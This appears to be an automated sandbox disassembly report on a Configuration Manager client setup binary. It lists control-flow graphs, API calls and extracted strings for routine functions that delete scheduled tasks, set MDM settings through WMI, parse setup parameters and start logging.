                                                                                          control_flow_graph 1776 5c86ed-5c877f call 5d22be call 6093a0 call 6743a3 1783 5c878a-5c87a5 CoCreateInstance 1776->1783 1784 5c8781-5c8786 1776->1784 1785 5c87ab-5c87b1 1783->1785 1786 5c8963-5c89af 1783->1786 1784->1783 1787 5c87e5-5c87ea 1785->1787 1788 5c87b3-5c87be call 5f3b94 1785->1788 1795 5c89b1-5c89c0 call 5f0b53 1786->1795 1796 5c8a12-5c8a4b call 6092a8 call 5c6026 call 609305 1786->1796 1789 5c87ec-5c87f1 1787->1789 1790 5c87f5-5c8813 CoCreateInstance 1787->1790 1801 5c87c0-5c87e0 call 592624 1788->1801 1802 5c87e3 1788->1802 1789->1790 1793 5c8815-5c8824 call 5f0b53 1790->1793 1794 5c8887-5c889c 1790->1794 1812 5c884e-5c8877 call 592624 1793->1812 1813 5c8826-5c884b GetCurrentThreadId call 5f1811 1793->1813 1810 5c8be0-5c8be8 1794->1810 1811 5c88a2-5c88a9 1794->1811 1814 5c89ea-5c8a07 1795->1814 1815 5c89c2-5c89e7 GetCurrentThreadId call 5f1811 1795->1815 1853 5c8bf8-5c8c01 call 5f3b94 1796->1853 1854 5c8a51-5c8a57 1796->1854 1801->1802 1802->1787 1816 5c8bef-5c8bf6 1810->1816 1817 5c8bea call 5f0dba 1810->1817 1819 5c88ab-5c88b5 call 5f0b53 1811->1819 1820 5c8927-5c8932 call 5f3b94 1811->1820 1836 5c887e-5c8c5f 1812->1836 1837 5c8879 call 5f0dba 1812->1837 1813->1812 1814->1796 1815->1814 1826 5c8c62-5c8c64 1816->1826 1817->1816 1844 5c88e7-5c8917 call 592624 1819->1844 1845 5c88b7-5c88e4 GetCurrentThreadId call 5f1811 1819->1845 1820->1810 1842 5c8938-5c895e 1820->1842 1831 5c8c8e-5c8cc8 call 6093cf call 5c5ee8 call 5c5eb3 call 5c5f1d call 5d2223 1826->1831 1832 5c8c66-5c8c8b call 592624 1826->1832 1832->1831 1836->1826 1837->1836 1848 5c8bd7-5c8bdd call 592624 1842->1848 1862 5c891e-5c8922 1844->1862 1863 5c8919 call 5f0dba 1844->1863 1845->1844 1848->1810 1870 5c8c29-5c8c36 1853->1870 1871 5c8c03-5c8c21 call 592624 1853->1871 1854->1853 1861 5c8a5d-5c8a64 1854->1861 1867 5c8adb-5c8b0d call 6092a8 call 609305 1861->1867 1868 5c8a66-5c8a75 call 5f0b53 1861->1868 1862->1826 1863->1862 1894 5c8ba5-5c8bae call 5f3b94 1867->1894 1895 5c8b13-5c8b1a 1867->1895 1883 5c8a9f-5c8ad2 call 592624 1868->1883 1884 5c8a77-5c8a9c GetCurrentThreadId call 5f1811 1868->1884 1877 5c8c3d-5c8c41 1870->1877 1878 5c8c38 call 5f0dba 1870->1878 1880 5c8c26 1871->1880 1877->1831 1878->1877 1880->1870 1883->1867 1884->1883 1894->1810 1904 5c8bb0-5c8bd1 1894->1904 1897 5c8b7c-5c8b87 call 5f3b94 1895->1897 1898 5c8b1c-5c8b26 call 5f0b53 1895->1898 1897->1810 1907 5c8b89-5c8ba3 1897->1907 1905 5c8b58-5c8b74 1898->1905 1906 5c8b28-5c8b55 GetCurrentThreadId call 5f1811 1898->1906 1904->1848 1905->1897 1906->1905 1907->1848
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005C86F7
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • CoCreateInstance.OLE32(007033E8,00000000,00000017,006EED28,?,DeleteWinSchedTask,000000BC,005C73F2,?,Microsoft\Microsoft\Configuration Manager,CreateWinSchedTaskNew,?,Microsoft\Configuration Manager,S-1-5-18), ref: 005C879B
                                                                                          • CoCreateInstance.OLE32(007033C8,00000000,00000017,006EECF8,?), ref: 005C8806
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C8837
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C88CC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C89D3
                                                                                            • Part of subcall function 006092A8: __EH_prolog3.LIBCMT ref: 006092AF
                                                                                            • Part of subcall function 00609305: __EH_prolog3.LIBCMT ref: 0060930C
                                                                                            • Part of subcall function 00609305: SysFreeString.OLEAUT32(000000FF), ref: 00609321
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C8A88
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C8B3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$CreateInstance$FreeH_prolog3_catchString
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$4n$DeleteWinSchedTask$Failed to create CLSID_CTaskScheduler instance (0x%08X).$Failed to create Windows Task Scheduler instance. Error 0x%08x$Failed to delete task '%s'. Error 0x%x$Folder '%s' not found. Task does not exist.$ITaskFolder::DeleteTask('%s') failed with 0x%x$ITaskScheduler::Delete('%s') failed with 0x%x$ITaskService::Connect failed with 0x%08x$ITaskService::GetFolder failed with 0x%x$Successfully deleted task '%s'$Successfully deleted task '%s'$Task '%s' does not exist$\n$ln$spTaskSched.createInstance(CLSID_CTaskScheduler)$spTaskService->Connect(vEmpty, vEmpty, vEmpty, vEmpty)$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$n$n$n$n
                                                                                          • API String ID: 3107850510-1116063348
                                                                                          • Opcode ID: c98567de65bd40d4118bf0952e909717503dac3a77c8ac1e1027639cc4551528
                                                                                          • Instruction ID: b48cc09509992d3649b2c57104fbb39391a929ff1a4d8d2c2d479cadacef3e8e
                                                                                          • Opcode Fuzzy Hash: c98567de65bd40d4118bf0952e909717503dac3a77c8ac1e1027639cc4551528
                                                                                          • Instruction Fuzzy Hash: B9F1ADB1D02359AEDF10DFA5C849FAEBFB5BF45704F144049E4047B282DBB64A09CBA2
                                                                                          Function 0061FEB6 Relevance: 77.3, APIs: 7, Strings: 37, Instructions: 321threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1910 61feb6-61ff1b call 5d22f4 call 6013b4 call 60b178 call 5f419f call 6743a3 call 5f3b94 1923 61ff65-61ff6c call 5fc52f 1910->1923 1924 61ff1d-61ff21 1910->1924 1932 61ffbb-61ffd3 call 603360 1923->1932 1933 61ff6e-61ff77 call 5f3b94 1923->1933 1926 61ff23 1924->1926 1927 61ff25-61ff29 1924->1927 1926->1927 1929 61ff2b-61ff2d 1927->1929 1930 61ff2f 1927->1930 1931 61ff31-61ff5d call 592624 1929->1931 1930->1931 1937 61ff62 1931->1937 1940 620041-620045 1932->1940 1941 61ffd5-61ffe4 call 5f0b53 1932->1941 1942 61ff79-61ff9d call 592624 1933->1942 1943 61ff9e-61ffa0 1933->1943 1937->1923 1944 620047-620049 1940->1944 1945 62004b 1940->1945 1957 61ffe6-62000a GetCurrentThreadId call 5f1811 1941->1957 1958 62000d-62002d 1941->1958 1942->1943 1948 61ffa3-61ffab 1943->1948 1949 62004d-620078 call 5f567f call 5c6026 call 602d53 1944->1949 1945->1949 1952 61ffb2-61ffb6 1948->1952 1953 61ffad call 5f0dba 1948->1953 1972 62007d-620085 1949->1972 1956 62033a-620367 call 59ef10 call 5b15e4 call 577fd4 call 5d2246 1952->1956 1953->1952 1957->1958 1962 620033-62003c call 592624 1958->1962 1962->1948 1975 620112-620117 1972->1975 1976 62008b-6200a9 call 5c6026 call 60158f 1972->1976 1978 62018b-62018f 1975->1978 1979 620119-620128 call 5f0b53 1975->1979 1976->1978 1997 6200af-6200be call 5f0b53 1976->1997 1982 620193-6201a8 call 60ce69 1978->1982 1983 620191 1978->1983 1990 620151-62015a call 5f3b94 1979->1990 1991 62012a-62014e GetCurrentThreadId call 5f1811 1979->1991 1993 620207-62020e 1982->1993 1994 6201aa-6201b9 call 5f0b53 1982->1994 1983->1982 1990->1948 2007 620160-620180 1990->2007 1991->1990 2000 620212-620227 call 60ce69 1993->2000 2001 620210 1993->2001 2011 6201e2-6201fc 1994->2011 2012 6201bb-6201df GetCurrentThreadId call 5f1811 1994->2012 2008 6200c0-6200e4 GetCurrentThreadId call 5f1811 1997->2008 2009 6200e7-62010d 1997->2009 2013 620229-620238 call 5f0b53 2000->2013 2014 62028c-62029f call 6038ef 2000->2014 2001->2000 2007->1978 2008->2009 2009->1962 2011->1993 2012->2011 2023 620261-620281 2013->2023 2024 62023a-62025e GetCurrentThreadId call 5f1811 2013->2024 2025 6202a1-6202b0 call 5f0b53 2014->2025 2026 620304-62030c 2014->2026 2023->2014 2024->2023 2034 6202b2-6202d6 GetCurrentThreadId call 5f1811 2025->2034 2035 6202d9-6202f9 2025->2035 2028 620313-62031a 2026->2028 2029 62030e call 5f0dba 2026->2029 2028->1956 2029->2028 2034->2035 2035->2026
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061FEC0
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061FFF7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006200D1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062013B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006201CC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062024B
                                                                                            • Part of subcall function 006038EF: __EH_prolog3_catch.LIBCMT ref: 006038F6
                                                                                            • Part of subcall function 006038EF: GetCurrentThreadId.KERNEL32 ref: 00603953
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006202C3
                                                                                          Strings
                                                                                          • Failed to create instance of MDM_ConfigSetting. Error 0x%x, xrefs: 00620102
                                                                                          • spObject.SetString(c_szCoMgmt_SettingValue, sSettingValue.c_str()), xrefs: 00620241
                                                                                          • spObject.SetString(c_szCoMgmt_SettingName, sSettingName.c_str()), xrefs: 006201C2
                                                                                          • Failed to SetString for SettingName. Error 0x%x, xrefs: 006201F7
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006200D9
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006201D4
                                                                                          • root\cimv2\mdm, xrefs: 0061FFBF
                                                                                          • spNamespace.Open(c_szMdmNamespace), xrefs: 0061FFED
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00620246
                                                                                          • SettingName, xrefs: 00620194
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061FFFF
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0062023B
                                                                                          • Failed to PutInstance. Error 0x%x, xrefs: 006202F4
                                                                                          • Failed to get MDM_ConfigSetting instance, 0x%x, xrefs: 0062017B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006202BE
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006202CB
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0062012B
                                                                                          • CcmUtilLib::SetPropertyToMDMConfigSetting, xrefs: 0061FEF7
                                                                                          • MDM_ConfigSetting, xrefs: 00620095
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006201C7
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 00620143
                                                                                          • OS is not Win10RS3+, ENDOK., xrefs: 0061FF8E
                                                                                          • spNamespace.PutInstance(spObject), xrefs: 006202B9
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006200C1
                                                                                          • Failed to SetString for SettingValue. Error 0x%x, xrefs: 0062027C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061FFF2
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006202B3
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 00620253
                                                                                          • Updating MDM_ConfigSetting.%s with value %s, xrefs: 0061FF51
                                                                                          • SettingValue, xrefs: 00620213
                                                                                          • MDM_ConfigSetting.SettingName="%s", xrefs: 0062004E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006200CC
                                                                                          • Failed to open MDM namespace. Error 0x%x, xrefs: 00620028
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 006201BC
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061FFE7
                                                                                          • spNamespace.CreateInstance(c_szMdmConfigClassName, &spObject), xrefs: 006200C7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00620136
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$CcmUtilLib::SetPropertyToMDMConfigSetting$Failed to PutInstance. Error 0x%x$Failed to SetString for SettingName. Error 0x%x$Failed to SetString for SettingValue. Error 0x%x$Failed to create instance of MDM_ConfigSetting. Error 0x%x$Failed to get MDM_ConfigSetting instance, 0x%x$Failed to open MDM namespace. Error 0x%x$MDM_ConfigSetting$MDM_ConfigSetting.SettingName="%s"$OS is not Win10RS3+, ENDOK.$SettingName$SettingValue$Updating MDM_ConfigSetting.%s with value %s$root\cimv2\mdm$spNamespace.CreateInstance(c_szMdmConfigClassName, &spObject)$spNamespace.Open(c_szMdmNamespace)$spNamespace.PutInstance(spObject)$spObject.SetString(c_szCoMgmt_SettingName, sSettingName.c_str())$spObject.SetString(c_szCoMgmt_SettingValue, sSettingValue.c_str())
                                                                                          • API String ID: 355227296-1263417858
                                                                                          • Opcode ID: c0b649ce12d54611f89e52a5003cbf0dc55298fa880a40974caddccd2547f932
                                                                                          • Instruction ID: a62eccbaf1da9338ccb6f64611b93d993d3a3a055842ec55e350aa09cf2738ad
                                                                                          • Opcode Fuzzy Hash: c0b649ce12d54611f89e52a5003cbf0dc55298fa880a40974caddccd2547f932
                                                                                          • Instruction Fuzzy Hash: 99C1D6B1D41268AAEF20DBA4DC49FDEBF79AF51700F144059F5087B282C7B85A45CFA1
                                                                                          Function 0057AFED Relevance: 70.9, APIs: 1, Strings: 39, Instructions: 871COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057AFF7
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005A1CAB: __EH_prolog3_GS.LIBCMT ref: 005A1CB2
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005B75A1: __EH_prolog3_catch.LIBCMT ref: 005B75A8
                                                                                            • Part of subcall function 005B75A1: GetCurrentThreadId.KERNEL32 ref: 005B7633
                                                                                            • Part of subcall function 005A162C: __EH_prolog3_GS.LIBCMT ref: 005A1633
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_Thread$H_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s: %i$%s: %i$-&$0$@&$CCMCERTID$CCMCERTID: %s$CCMCERTISSUERS$CCMCERTISSUERS: %s$CCMCERTSEL$CCMCERTSEL: %s$CCMCERTSTORE$CCMCERTSTORE: %s$CCMFIRSTCERT$CCMFIRSTCERT: %u$CCMHTTPPORT$CCMHTTPPORT: %u$CCMHTTPSCERTNAME$CCMHTTPSCERTNAME: %s$CCMHTTPSPORT$CCMHTTPSPORT: %u$CCMHTTPSSTATE$CCMHTTPSSTATE: %u$CCMPKICERTOPTIONS$CCMPKICERTOPTIONS: %u$CcmSetup::CalculateParameters$FSP$FSP: %s$Lookup MP: %s$MANAGEDINSTALLER$S&$SMSMP$SMSSLP$SMSSLP: %s$`&$l&$s&$x&$%
                                                                                          • API String ID: 2467020135-563852022
                                                                                          • Opcode ID: 8670351666505cfca9bc8dc4790d0e0574b7e883e1b1b715f97aec5ed6fded17
                                                                                          • Instruction ID: f2fede161c4ea76e4e6307bd7386e4a70808206774b1f96503db3d57162a9348
                                                                                          • Opcode Fuzzy Hash: 8670351666505cfca9bc8dc4790d0e0574b7e883e1b1b715f97aec5ed6fded17
                                                                                          • Instruction Fuzzy Hash: E9828C70900249EEEF11DFA4D98AFEEBFB9BF55300F108099E105A7192DB749A48DF61
                                                                                          Function 0058D37E Relevance: 65.0, APIs: 12, Strings: 25, Instructions: 273threadfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2478 58d37e-58d3f5 call 5d22f4 call 5f4253 call 6743a3 call 605d68 2487 58d407-58d412 call 59c905 2478->2487 2488 58d3f7-58d400 call 607fc3 2478->2488 2491 58d417-58d45d call 5f4253 call 578598 call 59ef10 GetEnvironmentVariableW 2487->2491 2492 58d405 2488->2492 2499 58d45f-58d46b call 5a0a9c 2491->2499 2500 58d4b3-58d4b7 2491->2500 2492->2491 2499->2500 2508 58d46d-58d482 GetEnvironmentVariableW 2499->2508 2501 58d4b9-58d4bb 2500->2501 2502 58d4bd 2500->2502 2504 58d4bf-58d4c9 GetFileAttributesW 2501->2504 2502->2504 2506 58d4cf-58d4e8 call 60052a 2504->2506 2507 58d5f3-58d5f7 2504->2507 2517 58d4ea 2506->2517 2518 58d4ec-58d51b CreateFileW call 57814c call 6005cb 2506->2518 2509 58d5f9 2507->2509 2510 58d5fb-58d60c call 59c905 2507->2510 2508->2500 2512 58d484-58d4ae call 5f4253 call 578598 call 59ef10 2508->2512 2509->2510 2520 58d60e-58d618 call 5f0b53 2510->2520 2521 58d592-58d5b9 call 5f2d38 2510->2521 2512->2500 2517->2518 2542 58d51d-58d53b GetLastError call 5f0b53 2518->2542 2543 58d581-58d58e CloseHandle 2518->2543 2532 58d569-58d571 2520->2532 2533 58d61e-58d641 GetCurrentThreadId 2520->2533 2534 58d5bf-58d5c9 call 5f0b53 2521->2534 2535 58d646-58d657 call 5f2ec7 2521->2535 2537 58d578-58d57c 2532->2537 2538 58d573 call 5f0dba 2532->2538 2539 58d560-58d566 call 5f1811 2533->2539 2534->2532 2550 58d5cb-58d5ee GetCurrentThreadId 2534->2550 2554 58d659-58d663 call 5f0b53 2535->2554 2555 58d691-58d69a call 5f3b94 2535->2555 2548 58d6fc-58d724 call 59f417 call 59ef10 call 5d2246 2537->2548 2538->2537 2539->2532 2542->2532 2556 58d53d-58d55b GetCurrentThreadId 2542->2556 2543->2521 2550->2539 2554->2532 2564 58d669-58d687 GetCurrentThreadId 2554->2564 2565 58d6c9-58d6d1 2555->2565 2566 58d69c-58d6c1 GetCurrentProcessId call 592624 2555->2566 2556->2539 2564->2555 2569 58d6d8-58d6df 2565->2569 2570 58d6d3 call 5f0dba 2565->2570 2572 58d6c6 2566->2572 2569->2548 2570->2569 2572->2565
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058D385
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                            • Part of subcall function 00605D68: __EH_prolog3_catch_GS.LIBCMT ref: 00605D6F
                                                                                            • Part of subcall function 00605D68: GetCurrentThreadId.KERNEL32 ref: 00605DC2
                                                                                          • GetEnvironmentVariableW.KERNEL32(CcmSetupLogFileName,00000000,00000000,00000001,00000000,00000000,?,?,ccmsetup.log,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU),?,CcmSetup::InitializeLogging), ref: 0058D455
                                                                                          • GetEnvironmentVariableW.KERNEL32(CcmSetupLogFileName,?,?,00000001), ref: 0058D478
                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0058D4C0
                                                                                          • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000080,00000000,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU),00000000), ref: 0058D4FC
                                                                                          • GetLastError.KERNEL32(?,10000000,00000000,00000000,00000002,00000080,00000000,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU),00000000), ref: 0058D51D
                                                                                            • Part of subcall function 00607FC3: __EH_prolog3_catch.LIBCMT ref: 00607FCA
                                                                                            • Part of subcall function 00607FC3: GetCurrentThreadId.KERNEL32 ref: 0060802A
                                                                                            • Part of subcall function 00607FC3: LocalFree.KERNEL32(00000000,?,0000000C,00000000,00000001,00000000,00000000,CCM::Utility::Filesystem::Path::CreateEx,00000020,005817C1,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY),?), ref: 0060812F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058D553
                                                                                          • CloseHandle.KERNEL32(000000FF,?,10000000,00000000,00000000,00000002,00000080,00000000,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU),00000000), ref: 0058D588
                                                                                            • Part of subcall function 005F2D38: __EH_prolog3_catch.LIBCMT ref: 005F2D3F
                                                                                            • Part of subcall function 005F2D38: GetCurrentThreadId.KERNEL32 ref: 005F2D7F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058D5E1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058D634
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058D67F
                                                                                          • GetCurrentProcessId.KERNEL32(00000001,ccmsetup,00000010,?,?,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU)), ref: 0058D6B1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$Thread$EnvironmentFileH_prolog3_catchH_prolog3_catch_Variable$AttributesCloseCreateErrorFreeH_prolog3HandleLastLocalProcess
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$==========[ ccmsetup started in process %lu ]==========$CcmSetup::InitializeLogging$CcmSetupLogFileName$Logs\$O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)(A;CIOI;GR;;;IU)$SetCustomLoggingHandler(&lhi)$SetDefaultComponent(c_szServiceName)$SetObjectSecurity( m_sLogFile, c_szLogsDirectorySecurity )$`)l$ccmsetup$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.log$shLogFile.null() == false$(
                                                                                          • API String ID: 1275211060-2713520664
                                                                                          • Opcode ID: e5f1ea002ce018fb5df80b7fca368d70a500107d9f134e51cc819fa5a6fe37ac
                                                                                          • Instruction ID: 136a995f6880e58ac2098f46a661402c2757fd46836876d0b2704e17b467bfcf
                                                                                          • Opcode Fuzzy Hash: e5f1ea002ce018fb5df80b7fca368d70a500107d9f134e51cc819fa5a6fe37ac
                                                                                          • Instruction Fuzzy Hash: 51A19A71D40248AADF20EBE4C949AEEBFB9BF52704F14801AF541B72C1CB755A05CB62
                                                                                          Function 00603360 Relevance: 59.8, APIs: 6, Strings: 28, Instructions: 288threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060346C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006035E2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603663
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006036B6
                                                                                          Strings
                                                                                          • root\, xrefs: 00603500
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603653
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603474
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060345C
                                                                                          • Failed to open to WMI namespace '%s' (%08lx), xrefs: 00603617
